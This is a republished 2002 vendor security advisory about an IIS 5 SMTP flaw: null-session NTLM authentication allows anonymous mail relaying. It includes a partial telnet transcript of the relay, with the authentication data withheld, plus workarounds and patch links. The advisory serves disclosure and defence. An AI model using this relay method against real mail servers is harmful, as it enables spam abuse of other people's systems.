Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:2573
HistoryMar 02, 2002 - 12:00 a.m.

IIS SMTP component allows mail relaying via Null Session

2002-03-0200:00:00
vulners.com
43
JSON

BindView Security Advisory

IIS SMTP component allows mail relaying via Null Session
Issue Date: March 1, 2002
Contact: [email protected]

Topic:
The SMTP component that comes with IIS can be used by anyone for
relaying email.

Overview:
IIS comes with a small SMTP component. The default settings allow
anyone who can authenticate to it to relay email. Because the
authentication system supports NTLM, it is possible for anyone to
authenticate using null session credentials, and then relay email.

Affected Systems:
IIS 5 servers with the the SMTP component enabled.
IIS 4 was not tested.

Impact:
The vulnerability would likely be exploited by spammers to
misappropriate bandwidth and CPU time. There does not appear to be
any way of using this vulnerability to run arbitrary code or otherwise
gain access to the vulnerable system.

Details:

The SMTP component supports the SMTP AUTH command, and allows NTLM as
an option within that. This is intended to be used by normal users to
authenticate themselves via an NTLM challenge-response. However,
because NTLM supports using null session credentials, an anonymous
user can use this mechanism to 'authenticate'. Once that is
accomplished, the SMTP service will relay email.

A sample transcript follows. The initial failure is not necessary; it
is simply to illustrate that relay requires authentication: (Release
of the actual authentication data is being delayed in accordance with
draft-christey-wysopal-vuln-disclosure-00.txt)

% telnet 192.168.8.129 25
Trying 192.168.8.129…
Connected to 192.168.8.129.
Escape character is '^]'.
220 w2ks.w2kvm.qnz.org Microsoft ESMTP MAIL Service, Version: 5.0.2172.1 ready at
Wed, 29 Aug 2001 11:52:15 -0400
HELO foo
250 w2ks.w2kvm.qnz.org Hello [192.168.8.1]
MAIL From:<>
250 2.1.0 <>…Sender OK
RCPT To:<[email protected]>
550 5.7.1 Unable to relay for [email protected]
AUTH NTLM <etc, etc>
334 <etc, etc>
<etc, etc>
235 2.7.0 Authentication successfull
MAIL From:<>
503 5.5.2 Sender already specified
RCPT To:<[email protected]>
250 2.1.5 [email protected]
DATA
354 Start mail input; end with <CRLF>.<CRLF>
Subject: your SMTP server supports null sessions

yada yada yada

.
250 2.6.0 <[email protected]> Queued mail for delivery
QUIT
221 2.0.0 w2ks.w2kvm.qnz.org Service closing transmission channel
Connection closed by foreign host.

Workarounds:
Disable the SMTP service.
Disable the ability of authenticated users to relay email.
Firewall off the SMTP service from untrusted networks.

Recommendations:
Disable the SMTP service, if not needed.
Install the patch from Microsoft

References:

Microsoft's security bulletin:
http://www.microsoft.com/technet/security/bulletin/MS02-011.asp

Microsoft's Hotfix:
Windows 2000: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=36556
(the download page mentions ms02-012, but the patch also covers ms02-011)

Exchange 5.5: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=33423

Microsoft's Knowledge Base article:
http://www.microsoft.com/technet/support/kb.asp?ID=310669

JSON